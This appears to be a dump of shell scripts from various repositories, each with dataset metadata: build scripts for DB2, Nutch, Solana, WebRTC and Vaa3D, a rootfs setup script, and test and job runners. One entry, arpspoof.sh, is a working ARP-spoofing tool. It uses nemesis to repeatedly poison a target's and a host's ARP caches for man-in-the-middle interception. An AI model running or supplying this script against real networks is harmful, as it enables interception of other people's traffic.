db2terminate() {
db2 terminate
}
db2runscript() {
local -r f=$1
db2 -x -tsf $f
[ $? -ne 0 ] && logfail "Failed running $f"
}
db2exportcommand() {
required_var DELIM
local -r output=$1
shift
echo $@
db2 EXPORT TO $output OF DEL MODIFIED BY NOCHARDEL COLDEL$DELIM $@
[ $? -ne 0 ] && logfail "Failed while export the statement"
}
db2loadblobs() {
local -r IMPFILE=$1
local -r IMPBLOBDIR=$2
local -r IMPTABLE=$3
log "Load $IMPTABLE table from server $IMPFILE using blobs in $IMPBLOBDIR"
db2 "LOAD FROM $IMPFILE OF DEL LOBS FROM $IMPBLOBDIR MODIFIED BY COLDEL$COLDEL REPLACE INTO $IMPTABLE"
[ $? -ne 0 ] && logfail "Load failed"
}
| true
|
b18b73c74bbffe0bd018a8c6a94bc83429ec511a
|
Shell
|
eabyshev/base
|
/big-data/nutch/nutch/DEBIAN/postinst
|
UTF-8
| 378
| 3.578125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Debian postinst for the nutch package: link the configuration files in
# the config dir into the installed tree's conf/ directory.
set -e
# Pick up NUTCH_HOME / NUTCH_CONF_DIR if they are exported system-wide.
FilePath="/etc/profile"
. $FilePath
nutchVersion=1.4.4
nutchHome="/opt/nutch-$nutchVersion"
nutchConf="/etc/nutch"
# Environment overrides win over the version-derived defaults.
if [[ "x$NUTCH_HOME" != "x" ]];
then
    nutchHome=$NUTCH_HOME
fi
if [[ "x$NUTCH_CONF_DIR" != "x" ]];
then
    nutchConf=$NUTCH_CONF_DIR
fi
# Create symlink to configuration files and scripts
ln -sf $nutchConf/* $nutchHome/conf/
| true
|
8eccfd5123e0266005d61f1ffe10a440531e3680
|
Shell
|
andersonledo/ironman
|
/templates/remember-next-events.sh
|
UTF-8
| 267
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Emit an e-mail body (via expanded here-doc on stdout) reminding a project
# team of upcoming events.
# NOTE(review): $NOME_PROJETO and $FASE_PROJETO are referenced but never set
# here -- presumably exported by the calling script; confirm against caller.
# Parameters: $1 = event list text, $2 = signature/footer text
EVENTOS_PROJETO=$1
RODAPE=$2
# Template (variables expand inside the unquoted here-doc)
cat << EOF
Subject: [$NOME_PROJETO - $FASE_PROJETO] Próximos eventos
Pessoal,
Lembrando que nos próximos dias temos os seguintes eventos:
$EVENTOS_PROJETO
Agendem-se.
Atenciosamente,
$RODAPE
EOF
| true
|
05f203aa5ae9504f0689731f5fc0b656ae5777b8
|
Shell
|
kevindang88/edu
|
/cs260/assignment-3/s5.ksh
|
UTF-8
| 277
| 3.296875
| 3
|
[] |
no_license
|
# Same as Bourne shell
# Prompt for a color and classify it with a case statement.
# '\c' under 'echo -e' suppresses the trailing newline so input is typed
# on the same line as the prompt.
echo -e "Enter a color: \c"
read color
case $color in
bl*|Bl*)
  # Any word beginning with "bl"/"Bl" (blue, black, ...).
  echo "The sky color is $color."
  ;;
red|yellow)
  echo "The sun is sometimes this color."
  ;;
*)
  echo "That color is not in any of the categories defined."
  ;;
esac
| true
|
805542122df8355dea32fd31317b7af48a506484
|
Shell
|
qzchenwl/utils
|
/scripts/bin/wireless-setup
|
UTF-8
| 183
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
#
# wireless-setup - associate wlan0 with an open ESSID and request a DHCP
# lease.
#
# BUG FIX: the original 'if [ -z "$1"]' lacked the space before ']' and the
# 'then'/'fi' keywords entirely, so the script failed to parse, and it never
# exited after printing usage.
if [ -z "$1" ]; then
    echo "Usage: $0 ESSID" >&2
    exit 1
fi

sudo ifconfig wlan0 up
sudo iwconfig wlan0 txpower on
# For a WEP network, append: key s:password [1]
sudo iwconfig wlan0 essid "$1"
sudo dhclient wlan0
| true
|
e9c1cb3b0ff3d7484be64a730d6a0a855b78a5f9
|
Shell
|
art200109/project
|
/flask/flask_user/useradd.sh
|
UTF-8
| 396
| 2.5625
| 3
|
[] |
no_license
|
#! /bin/bash
# Provision a restricted 'flask_user' account: restricted shell (rbash),
# a whitelisted 'programs' dir containing only docker, and SSH key login.
# Must run as root (userdel/useradd/chown).
# rbash = restricted bash; -n keeps an existing copy.
cp -n /bin/bash /bin/rbash
# Staging area: the only program the account may run is docker.
mkdir -p ./flask_user/programs
ln -s /usr/bin/docker ./flask_user/programs/
cp ./.bash_profile ./flask_user
# Key-only SSH access via the pre-generated docker key.
mkdir ./flask_user/.ssh
cp ./.ssh/docker_key.pub ./flask_user/.ssh/authorized_keys
# Recreate the account from scratch (stdout of userdel discarded).
userdel -r flask_user > /dev/null
useradd -s /bin/rbash -G docker flask_user
# Install the staged home directory and hand it to the new user.
cp -rf ./flask_user /home/
chown -R flask_user /home/flask_user
rm -rf ./flask_user
| true
|
95900fd4254b1513f0f8437e772c07990cbac39f
|
Shell
|
jtwray/solana
|
/ci/test-bench.sh
|
UTF-8
| 740
| 3.125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# CI benchmark job: run cargo benches on the nightly toolchain and upload
# the parsed results as a build artifact (and metrics, on non-PR builds).
set -e
cd "$(dirname "$0")/.."

# shellcheck disable=SC1091
source ci/upload_ci_artifact.sh

# Exports channel variables such as EDGE_CHANNEL.
eval "$(ci/channel-info.sh)"
ci/version-check.sh nightly
export RUST_BACKTRACE=1

# Echo-then-run helper so each step is visible in the CI log.
_() {
  echo "--- $*"
  "$@"
}

set -o pipefail

# PRs (or local runs with no branch) target the edge channel and skip the
# metrics upload; branch builds upload metrics for their own branch.
UPLOAD_METRICS=""
TARGET_BRANCH=$BUILDKITE_BRANCH
if [[ -z $BUILDKITE_BRANCH ]] || ./ci/is-pr.sh; then
  TARGET_BRANCH=$EDGE_CHANNEL
else
  UPLOAD_METRICS="upload"
fi

BENCH_FILE=bench_output.log
BENCH_ARTIFACT=current_bench_results.log

# Capture the JSON bench output, then post-process/upload it.
_ cargo bench --features=unstable --verbose -- -Z unstable-options --format=json | tee "$BENCH_FILE"
_ cargo run --release --bin solana-upload-perf -- "$BENCH_FILE" "$TARGET_BRANCH" "$UPLOAD_METRICS" >"$BENCH_ARTIFACT"

upload_ci_artifact "$BENCH_ARTIFACT"
| true
|
c2b84fce4658fca128371b27e4d65f9df57c5551
|
Shell
|
xaverh/bootstrap-scripts
|
/stage3/root.sh
|
UTF-8
| 1,741
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/true
set -e
. $(dirname $(realpath -s $0))/common.sh
printInfo "Configuring root filesystem layout"
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}"/usr/{bin,lib,share,sbin,include}
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}"/{etc,proc,run,var,sys,dev,tmp}
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}/run/lock"
ln -sv ../run/lock "${SERPENT_INSTALL_DIR}/var/lock"
ln -sv lib "${SERPENT_INSTALL_DIR}/usr/lib64"
ln -sv usr/bin "${SERPENT_INSTALL_DIR}/bin"
ln -sv usr/sbin "${SERPENT_INSTALL_DIR}/sbin"
ln -sv usr/lib "${SERPENT_INSTALL_DIR}/lib"
ln -sv usr/lib64 "${SERPENT_INSTALL_DIR}/lib64"
printInfo "Constructing device nodes"
# TTY support
mknod -m 622 "${SERPENT_INSTALL_DIR}"/dev/console c 5 1
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/ptmx c 5 2
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/tty c 5 0
chown -v root:tty "${SERPENT_INSTALL_DIR}"/dev/{console,ptmx,tty}
# Runtime support for random/null/zero
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/null c 1 3
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/zero c 1 5
mknod -m 444 "${SERPENT_INSTALL_DIR}"/dev/random c 1 8
mknod -m 444 "${SERPENT_INSTALL_DIR}"/dev/urandom c 1 9
printInfo "Creating runtime device links"
# runtime support
ln -svf /proc/self/fd "${SERPENT_INSTALL_DIR}"/dev/fd
ln -svf /proc/self/fd/0 "${SERPENT_INSTALL_DIR}"/dev/stdin
ln -svf /proc/self/fd/1 "${SERPENT_INSTALL_DIR}"/dev/stdout
ln -svf /proc/self/fd/2 "${SERPENT_INSTALL_DIR}"/dev/stderr
ln -svf /proc/kcore "${SERPENT_INSTALL_DIR}"/dev/core
printInfo "Stashing /bin/sh compat link"
if [[ "${SERPENT_LIBC}" == "musl" ]]; then
ln -svf /serpent/usr/bin/dash "${SERPENT_INSTALL_DIR}/usr/bin/sh"
else
ln -sfv /serpent/usr/bin/bash "${SERPENT_INSTALL_DIR}/usr/bin/sh"
fi
| true
|
33be4c439308df7a04b99b4cede304eb96de9e9c
|
Shell
|
rmetcalf9/saas_user_management_system
|
/services/testContainer/testRunAppLocalDeveloperEndpoint.sh
|
UTF-8
| 736
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the user-management test-suite container against a locally running
# app instance, mounting this directory as the pytest source.
echo "Only works on locally running container because /public/api and /public/web are not present"
# The test user password must be supplied by the environment.
if [[ "E${SAASCODEFRESHTESTUSERPASSWORD}" == "E" ]]; then
  echo "You need to set SAASCODEFRESHTESTUSERPASSWORD to use this"
  exit 1
fi
# Host IP of the wlp2s0 interface, so the container can reach the app.
# NOTE(review): interface name is hard-coded to this developer's machine.
export HOSTIP=`ip -4 addr show scope global dev wlp2s0 | grep inet | awk '{print \$2}' | cut -d / -f 1`
docker run --rm --network main_net \
 -e BASEURL_TO_TEST=http://${HOSTIP}:8098 \
 -e APIAPP_DEFAULTHOMEADMINUSERNAME=admin \
 -e APIAPP_DEFAULTHOMEADMINPASSWORD=admin \
 -e EXPECTED_CONTAINER_VERSION=$(cat ../../VERSION) \
 -e RUNNINGVIAKONG="TRUE" \
 --mount type=bind,source=$(pwd),target=/ext_volume metcarob/saas_user_management_systemtest:latest python3 -m pytest /ext_volume
| true
|
dacbf6c842687cbe70008daed3fbb5d0bb6cfe40
|
Shell
|
rdisipio/MAMbo
|
/run/scripts_ttdiffxs_8TeV/submit_mc_particle_Alpgen.sh
|
UTF-8
| 944
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
analysis=tt_diffxs_8TeV
outtag=TTbarResolved_resolved
syst=particle
queue=T3_BO_LOCAL
[[ ${HOSTNAME} == *"cern.ch"* ]] && queue=1nh
alpgen_list=${PWD}/AlpgenPythia_ljets.dat
[ ! -z $1 ] && alpgen_list=$1
for ch in el mu
do
for dts in $(cat ${alpgen_list} | grep ":${ch}" | grep -v 'jjjj' | sort )
do
dsid=$(echo ${dts} | cut -d':' -f1)
hr=$(echo ${dts} | cut -d':' -f2)
# ch=$(echo ${dts} | cut -d':' -f3)
syst=$(echo ${hr} | cut -d'_' -f3)
[[ $syst == *"ttbar"* ]] && syst=nominal
params=${MAMBODIR}/share/control/analysis_params/${outtag}/mcparticle_${ch}.xml
filelist=${MAMBODIR}/share/control/file_list/${outtag}/mc.DiTop.${dsid}.mc.txt
tag=${analysis}.mc.DiTop.${dsid}.${ch}.${syst}.particle
outfile=particle/${tag}.histograms.root
jobname=${tag}
echo "Submitting ${jobname} output ${outfile}"
MAMbo-submit.sh -p ${params} -f ${filelist} -o ${outfile} -j ${jobname} -q ${queue}
done
done
| true
|
8f58229a0414fdabf201bc5e7b2af48962fbf8bc
|
Shell
|
Adrian-Rosoga/code_pi
|
/PiWebServer/pi_ws.service.install.sh
|
UTF-8
| 310
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install, start and enable the pi_ws systemd unit.
# Any failing command aborts the script immediately.
set -e

sudo cp /home/pi/code_pi/PiWebServer/pi_ws.service /etc/systemd/system
sudo systemctl daemon-reload
sudo systemctl start pi_ws.service

# Check status
# ('status' exits non-zero for a failed unit, so set -e stops us here
# before the unit gets enabled at boot.)
sudo systemctl status pi_ws.service

echo "All seems ok, enabling the service now..."
sudo systemctl enable pi_ws.service
echo "Done!"
| true
|
02e9ea0c95bd5221d37072da173c05078dab04e2
|
Shell
|
mmurdoch/arduinounit
|
/examples/advanced/test-vitro
|
UTF-8
| 1,021
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Figure out what to test
#
if [ $# -gt 0 ]; then
ARDUINO_TARGET_INO="$1"
else
ARDUINO_TARGET_INO="$(echo *.ino)"
fi
if [ ! -f "${ARDUINO_TARGET_INO}" ] ; then
echo "must specify ino file"
exit 1
fi
ARDUINO_TARGET_DIR="$(dirname "$ARDUINO_TARGET_INO")"
ARDUINO_TARGET_BASE="$(basename "$ARDUINO_TARGET_INO")"
ARDUINO_TARGET_FILE="${ARDUINO_TARGET_BASE%.ino}"
ARDUINO_TARGET_EXE="$ARDUINO_TARGET_DIR/$ARDUINO_TARGET_FILE"
/bin/rm -rf "${ARDUINO_TARGET_EXE}.log" "${ARDUINO_TARGET_EXE}.xml"
if [ ! -x "${ARDUINO_TARGET_EXE}" ] ; then
echo "missing executable '${ARDUINO_TARGET_EXE}' -- did you compile?"
exit 1
fi
if [ "$TMP" = "" ] ; then
TMP="$(mktemp -d)"
trap '{ /bin/rm -rf "${TMP}"; }' EXIT
else
mkdir -p "$TMP"
fi
( "${ARDUINO_TARGET_EXE}" "$@"; echo "$?" > "$TMP/status" ) | tee "${ARDUINO_TARGET_EXE}.log"
STATUS="$(cat "$TMP/status")"
if [ -r "${ARDUINO_TARGET_EXE}.log" ]
then
./au2ju < "${ARDUINO_TARGET_EXE}.log" > "${ARDUINO_TARGET_EXE}.xml"
fi
exit $STATUS
| true
|
a7a63647d7eb71cfe1f5fb9c6b2338602d195290
|
Shell
|
Vaa3D/v3d_external
|
/build_VS2015.cmake
|
UTF-8
| 7,238
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
function download {
if [[ ! -e $2 ]]; then
echo "Downloading $1"
curl -L $1 -o $2
fi
}
shopt -s expand_aliases;
BUILD_HDF5=0
BOOST_MAJOR_VERSION=1_57
BOOST_VERSION=${BOOST_MAJOR_VERSION}_0
CMAKE_VERSION=2.8.12
CMAKE_ARGS=""
CMAKE_PLATFORM_ARGS=
CMAKE_BUILD="Release"
CMAKE_EXE=""
BUILD_DIR=`pwd`
ROOT_DIR=`pwd`
set -eu
KERNEL=(`uname -s | tr [A-Z] [a-z]`)
ARCH=(`uname -m | tr [A-Z] [a-z]`)
case $KERNEL in
darwin)
OS=macosx
;;
mingw*)
OS=windows
KERNEL=windows
;;
windows-x86_64)
;;
*)
OS=$KERNEL
;;
esac
case $ARCH in
arm*)
ARCH=arm
;;
i386|i486|i586|i686)
ARCH=x86
;;
amd64|x86-64)
ARCH=x86_64
;;
esac
PLATFORM=$OS-$ARCH
echo "Detected platform \"$PLATFORM\""
while [[ $# > 0 ]]; do
case "$1" in
-platform)
shift
PLATFORM="$1"
;;
-h5j)
CMAKE_ARGS+="-DUSE_FFMPEG:BOOL=ON -DUSE_X265:BOOL=ON -DUSE_HDF5:BOOL=ON"
BUILD_HDF5=1
;;
-qt5)
CMAKE_ARGS+=" -DFORCE_QT4:BOOL=OFF"
;;
-16)
CMAKE_ARGS+=" -DHIGH_BIT_DEPTH:BOOL=ON"
;;
-debug)
CMAKE_BUILD="Debug"
;;
install)
OPERATION=install
;;
clean)
OPERATION=clean
;;
clobber)
OPERATION=clobber
;;
*)
BUILD_DIR="$1"
;;
esac
shift
done
echo "Targeting platform \"$PLATFORM\""
echo "Root directory \"$ROOT_DIR\""
if [[ -z ${OPERATION:-} ]]; then
echo "Usage: build.cmake [-platform <name>] [-h5j] [-qt5] [-debug] <install | clean | clobber>"
echo "where possible platform names are: linux-x86, linux-x86_64, macosx-x86_64, windows-x86, windows-x86_64, etc."
echo " -h5j - builds for the Janelia Farm HDF variant. Enables building of FFmpeg, HDF5 and X265(HEVC)"
echo " -qt5 - build with Qt5 (experimental)"
echo " -debug - Generates a debug build (default is release)"
echo " clean - removes the current build for platform"
echo " clobber - cleans, and removes the current cmake directories"
exit 1
fi
boost_prefix=$BUILD_DIR/build_$PLATFORM/v3d_main/common_lib
CMAKE_PLATFORM_ARGS="-DBOOST_ROOT:PATH=$boost_prefix "
if [ $PLATFORM = "windows-x86_64" ]; then
CMAKE_PLATFORM_ARGS+="-DTIFF_INCLUDE_DIR:PATH=$ROOT_DIR/v3d_main/common_lib/include "
CMAKE_PLATFORM_ARGS+="-DTIFF_LIBRARY:PATH=$ROOT_DIR/v3d_main/common_lib/winlib64/libtiff.lib "
CMAKE_PLATFORM_ARGS+="-DFFTW_INCLUDE_DIR:PATH=$ROOT_DIR/v3d_main/common_lib/fftw-3.3.4-dll64 "
CMAKE_PLATFORM_ARGS+="-DFFTW_LIBRARY:PATH=$ROOT_DIR/v3d_main/common_lib/fftw-3.3.4-dll64/libfftw3f-3.lib"
fi
: "${CMAKE_DIR:=""}"
case $OPERATION in
install)
# See if the CMAKE_DIR is set
if [ ! "$CMAKE_DIR" = "" ]; then
if [[ -e $CMAKE_DIR ]]; then
CMAKE_EXE="$CMAKE_DIR/bin/cmake"
fi
fi
# If CMAKE_EXE is not set, then either find or build cmake
if [ "$CMAKE_EXE" = "" ]; then
if hash cmake 2>/dev/null; then
CMAKE_EXE="cmake"
else
if [[ ! -e cmake-$CMAKE_VERSION/bin/cmake ]]; then
if [[ ! -e cmake-$CMAKE_VERSION ]]; then
echo "Downloading cmake"
download http://www.cmake.org/files/v3.1/cmake-$CMAKE_VERSION.tar.gz cmake-$CMAKE_VERSION.tar.gz
tar xvfz cmake-$CMAKE_VERSION.tar.gz
fi
cd cmake-$CMAKE_VERSION
./configure --prefix=.
make
make install
cd ..
fi
CMAKE_EXE="../cmake-$CMAKE_VERSION/bin/cmake"
fi
fi
echo "Using $CMAKE_EXE"
if [[ ! -e $BUILD_DIR/build_$PLATFORM ]]; then
mkdir -p $BUILD_DIR/build_$PLATFORM/v3d_main/common_lib
fi
echo $boost_prefix
if [[ ! -e $boost_prefix/include ]]; then
echo "Unpacking Boost"
cd $boost_prefix
if [ $PLATFORM = "windows-x86_64" ]; then
if [[ ! -e boost_$BOOST_VERSION ]]; then
/c/Program\ Files/7-Zip/7z x -y $ROOT_DIR/v3d_main/common_lib/src_packages/boost_$BOOST_VERSION.tar.gz
/c/Program\ Files/7-Zip/7z x -y boost_$BOOST_VERSION.tar
fi
cd boost_$BOOST_VERSION
cmd //c .\\bootstrap.bat
cmd //c .\\b2.exe --toolset=msvc-14.0 address-model=64 --prefix=$boost_prefix install
else
tar xvf $ROOT_DIR/v3d_main/common_lib/src_packages/boost_$BOOST_VERSION.tar.gz
cd boost_$BOOST_VERSION
./bootstrap.sh --prefix=$boost_prefix
./b2 install
fi
cd ../../../../
fi
if [ $PLATFORM = "windows-x86_64" ]; then
if [[ ! -e $ROOT_DIR/v3d_main/common_lib/include/tiff.h ]]; then
echo "Configuring TIFF headers"
cd $ROOT_DIR/v3d_main/common_lib/build
/c/Program\ Files/7-Zip/7z x -y ../src_packages/tiff-4.0.2.tar.gz
cd tiff-4.0.2
nmake Makefile.vc
cp libtiff/tiff.h ../../include
cp libtiff/tiffconf.h ../../include
cp libtiff/tiffio.h ../../include
cp libtiff/tiffio.hxx ../../include
cp libtiff/tiffvers.h ../../include
cp libtiff/libtiff.lib ../../winlib64
cd ../../../..
fi
echo "Unpacking FFTW"
CMAKE_EXE+=" -G \"Visual Studio 14 2015 Win64\""
cd $ROOT_DIR/v3d_main/common_lib
if [[ ! -e fftw-3.3.4-dll64.tgz ]]; then
/c/Program\ Files/7-Zip/7z x -y fftw-3.3.4-dll64.tgz
fi
if [[ ! -e ffmpeg-2.5.2-win64 ]]; then
/c/Program\ Files/7-Zip/7z x -y ffmpeg-2.5.2-win64.tgz
fi
cd ../../
fi
cd $BUILD_DIR/build_$PLATFORM
echo $CMAKE_EXE -DCMAKE_BUILD_TYPE:STRING=$CMAKE_BUILD $CMAKE_ARGS $CMAKE_PLATFORM_ARGS $ROOT_DIR
eval $CMAKE_EXE -DCMAKE_BUILD_TYPE:STRING=$CMAKE_BUILD $CMAKE_ARGS $CMAKE_PLATFORM_ARGS $ROOT_DIR
if [ $PLATFORM = "windows-x86_64" ]; then
if [ $BUILD_HDF5 = 1 ]; then
echo "Building HDF5"
devenv Vaa3D.sln -project HDF5 -build $CMAKE_BUILD -out hdf5.txt
fi
echo "Building Vaa3D"
devenv Vaa3D.sln -build $CMAKE_BUILD -out all_build.txt
echo "Installing"
devenv Vaa3D.sln -project INSTALL -build $CMAKE_BUILD -out install.txt
echo "Done."
else
make
fi
;;
clean)
echo "Cleaning build_$PLATFORM directories"
if [[ -e $BUILD_DIR/build_$PLATFORM ]]; then
rm -rf $BUILD_DIR/build_$PLATFORM
fi
;;
clobber)
echo "Cleaning cmake directories"
if [[ -e cmake-$CMAKE_VERSION ]]; then
rm -rf cmake-$CMAKE_VERSION
fi
if [[ -e $BUILD_DIR/build_$PLATFORM ]]; then
rm -rf $BUILD_DIR/build_$PLATFORM
fi
;;
esac
| true
|
0cbfc6840484049a980a396fe5e29914b2c83fee
|
Shell
|
Landrylab/Gene_duplication_2019
|
/scripts_for_simulations/003_foldx_repair_slurm.sh
|
UTF-8
| 746
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate and submit a SLURM batch job that runs FoldX RepairPDB on a
# structure found in 002_ins_res_alt_crd, writing results to 003_repair.
# $1 = input PDB name without the '.pdb' extension
# The here-doc expands $1 now; its contents become the sbatch script, so no
# extra comment lines may be added inside it.
cat > $1_repair.sbatch << EOF
#!/bin/bash
#SBATCH -D /home/afcis2/FoldX_simulations
#SBATCH -J $1_repair
#SBATCH -o $1_repair.out
#SBATCH -c 1
#SBATCH -p ibismini
#SBATCH --time=1-00:00
#SBATCH --mem=51200
cp 002_ins_res_alt_crd/$1.pdb 003_repair
cd 003_repair
ln -s `which rotabase.txt` rotabase.txt
FoldX --command=RepairPDB --pdb=$1.pdb --ionStrength=0.05 --pH=7 --water=CRYSTAL --vdwDesign=2 --out-pdb=true --pdbHydrogens=false > $1_Repair.log
mkdir $1_Repair
mv $1_Repair?* $1_Repair
rm $1.pdb
EOF
# Queue the freshly generated job file.
sbatch $1_repair.sbatch
| true
|
963ee8dd6093a0d578515367bfcf108c2dc4646f
|
Shell
|
nneonneo/pwn-stuff
|
/misc/escencode_test.sh
|
UTF-8
| 1,467
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash -e
ESCENCODE="../escencode.py"
DIR=escencode_test
mkdir -p $DIR
cd $DIR
echo "[+] Making test files"
python -c 'import sys; sys.stdout.write("".join(chr(a)+chr(b) for a in xrange(256) for b in xrange(256)))' > test.bin
echo "[+] Testing C output"
cat > test.c <<EOF
char test[] =
$($ESCENCODE --style=c -W 80 test.bin)
;
#include <stdio.h>
int main() {
fwrite(test, 1, sizeof(test)-1, stdout);
}
EOF
gcc test.c -o test.c.exe
./test.c.exe > test.c.bin
cmp test.bin test.c.bin
echo "[+] Testing Python output"
cat > test.py <<EOF
import sys
sys.stdout.write(
$($ESCENCODE --style=python -W 80 test.bin)
)
EOF
python test.py > test.py.bin
cmp test.bin test.py.bin
echo "[+] Testing Ruby output"
cat > test.rb <<EOF
print $($ESCENCODE --style=ruby -W 80 test.bin)
EOF
ruby test.rb > test.rb.bin
cmp test.bin test.rb.bin
echo "[+] Testing Java output"
cat > test.java <<EOF
public class test {
public static final void main(String[] args) {
try {
System.out.write( ($($ESCENCODE --style=java -W 80 test.bin)).getBytes("ISO-8859-1"));
} catch(Exception e) {
e.printStackTrace();
System.exit(1);
}
}
}
EOF
javac test.java
java test > test.java.bin
cmp test.bin test.java.bin
echo "[+] Testing Echo output"
cat > test.echo.sh <<EOF
$($ESCENCODE --style=echo -W 80 test.bin)
EOF
bash test.echo.sh > test.echo.bin
cmp test.bin test.echo.bin
echo '[+] All tests passed!'
| true
|
8b5c62593649cb4058996093b9af78f52045d557
|
Shell
|
Wooork/Telegram-iOS
|
/third-party/webrtc/build-webrtc-buck.sh
|
UTF-8
| 1,168
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Build the WebRTC Objective-C framework for iOS with a vendored OpenSSL.
#   $1 = build directory, $2 = target CPU arch (arm64 / x64 / ...)
#
# BUG FIX: the original shebang was the malformed '#/bin/sh' (missing '!'),
# and the script relies on the bash builtins pushd/popd, so bash is required.
set -x
set -e

BUILD_DIR="$1"
ARCH="$2"

echo "BUILD_DIR=$BUILD_DIR"
echo "ARCH=$ARCH"

export PATH="$PATH:$BUILD_DIR/depot_tools_sources/depot_tools"

# Refresh the vendored OpenSSL/libssl trees inside the webrtc checkout.
rm -rf "$BUILD_DIR/webrtc-ios/src/openssl"
cp -R "$BUILD_DIR/openssl" "$BUILD_DIR/webrtc-ios/src/"
cp -R "$BUILD_DIR/libssl" "$BUILD_DIR/webrtc-ios/src/"

pushd "$BUILD_DIR/webrtc-ios/src"

# gn's rtc_build_ssl=false expects both libs directly under openssl/.
mv openssl/lib/libcrypto.a openssl/
mv libssl/lib/libssl.a openssl/

# Separate output dirs per target so device/simulator builds don't collide.
OUT_DIR="ios"
if [ "$ARCH" == "arm64" ]; then
  OUT_DIR="ios_64"
elif [ "$ARCH" == "x64" ]; then
  OUT_DIR="ios_sim"
fi

buildtools/mac/gn gen out/$OUT_DIR --args="use_xcode_clang=true "" target_cpu=\"$ARCH\""' target_os="ios" is_debug=false is_component_build=false rtc_include_tests=false use_rtti=true rtc_use_x11=false use_custom_libcxx=false use_custom_libcxx_for_host=false rtc_build_ssl=false rtc_build_examples=false rtc_build_tools=false ios_deployment_target="9.0" ios_enable_code_signing=false is_unsafe_developer_build=false rtc_enable_protobuf=false rtc_include_builtin_video_codecs=true rtc_build_libvpx=true rtc_libvpx_build_vp9=true rtc_use_gtk=false rtc_use_metal_rendering=true'
ninja -C out/$OUT_DIR framework_objc_static

popd
| true
|
5545b5715bf5e08482d759b87548f1bfad129f17
|
Shell
|
patilswati27/ShellScript
|
/Basic/table.sh
|
UTF-8
| 145
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Print the multiplication table of a number up to a given range
# (assumes a multiplication table was intended -- script is named table.sh).
#
# BUG FIX: the original loop tested $i but never changed it (infinite loop),
# and used 'expr $no^$r', where '^' is not an expr arithmetic operator, so
# it printed the literal expression rather than a product.
echo "Enter a Number"
read no
echo "Enter Range"
read r
for (( i = 1; i <= r; i++ ))
do
    echo "$(( no * i ))"
done
| true
|
55ab04fa23d429de19497e1b19b8fd43962f6cd9
|
Shell
|
cym13/scripts
|
/arpspoof.sh
|
UTF-8
| 1,151
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/sh
# ARP-spoof a target/host pair on a LAN using nemesis, re-poisoning both
# caches every 10 seconds so traffic flows through this machine.
# Usage: arpspoof.sh INTERFACE TARGET_IP HOST_IP   (re-execs itself via sudo)
if [ -z $(which nemesis) ] ; then
    echo "nemesis needed, check in your repositories."
    exit
elif [ $# -ne 3 ] ; then
    echo "Usage: arpspoof.sh INTERFACE TARGET_IP HOST_IP"
    exit
elif [ $(whoami) != "root" ] ; then
    # Raw packet injection requires root; rerun with the same arguments.
    sudo "$0" $@
    exit
fi

# Forge an ARP reply claiming $1 (from_ip) resolves to our MAC, sent to
# $2/$3 (to_ip/to_mac). nemesis_req $1=from_ip $2=to_ip $3=to_mac
nemesis_req () {
    nemesis arp -v -r -d $if -S $1 -D $2 -h $own_mac -m $3 -H $own_mac -M $3||\
        echo -e "\e[0;31m[ERROR IN REDIRECTION]\e[0m"
}

if=$1
# Our own IPv4 on the 192.168.0/1 subnet, scraped from 'ip a'.
own_ip=$(ip a|sed -n "/192.168.[01].[^\/]\+/s/^.*\(192[^\/]\+\)\/.*$/\1/p")
echo Own ip: $own_ip
# Our MAC for interface $if ("ether xx:xx:...").
re="/$if/,/^[0-9]/s/^.*ether \([0-9a-f]\{2\}\(:[0-9a-f]\{2\}\)\{5\}\).*$/\1/p"
own_mac=$(ip a|sed -n "$re")
echo Own mac: $own_mac
target_ip=$2
echo Target ip: $target_ip
# MACs come from the local ARP cache (fixed-column cut of 'arp' output).
target_mac=$(arp | grep $target_ip | cut -c 34-50)
echo Target mac: $target_mac
host_ip=$3
echo Host ip: $host_ip
host_mac=$(arp | grep $host_ip | cut -c 34-50)
echo Host mac: $host_mac

# Poison both directions forever; ARP caches expire, so repeat every 10s.
while [ 'This script is 42 lines long, do not break it!' ] ; do
    echo -e "\e[0;32mRedirecting...\e[0m"
    nemesis_req $host_ip $target_ip $target_mac
    nemesis_req $target_ip $host_ip $host_mac
    sleep 10
done
| true
|
7b5b96508bdc3e6e14bfa5ae2bd52071b41fe05e
|
Shell
|
SSchott/haddock3
|
/bin/activate
|
UTF-8
| 245
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Environment setup for HADDOCK3: record the install locations and make the
# package importable (PYTHONPATH) and its tools runnable (PATH).
export HADDOCK3=/home/rodrigo/haddock3
export CNS_EXE=/home/rodrigo/software/CNS/bin/cns

# Append HADDOCK3 to an existing PYTHONPATH, or start a fresh one when the
# variable is empty/unset. (Deliberately not exported here: when this file
# is sourced, an already-exported PYTHONPATH keeps its export attribute.)
if [[ -n "${PYTHONPATH:-}" ]]; then
  PYTHONPATH="${PYTHONPATH}:${HADDOCK3}"
else
  PYTHONPATH="${HADDOCK3}"
fi

export PATH="${PATH}:${HADDOCK3}/bin"
| true
|
7db5b6d45f8f9095fb29981d634518bc09c8867e
|
Shell
|
jeonghoonkang/BerePi
|
/apps/camera/crontab.sh
|
UTF-8
| 1,049
| 2.609375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
##
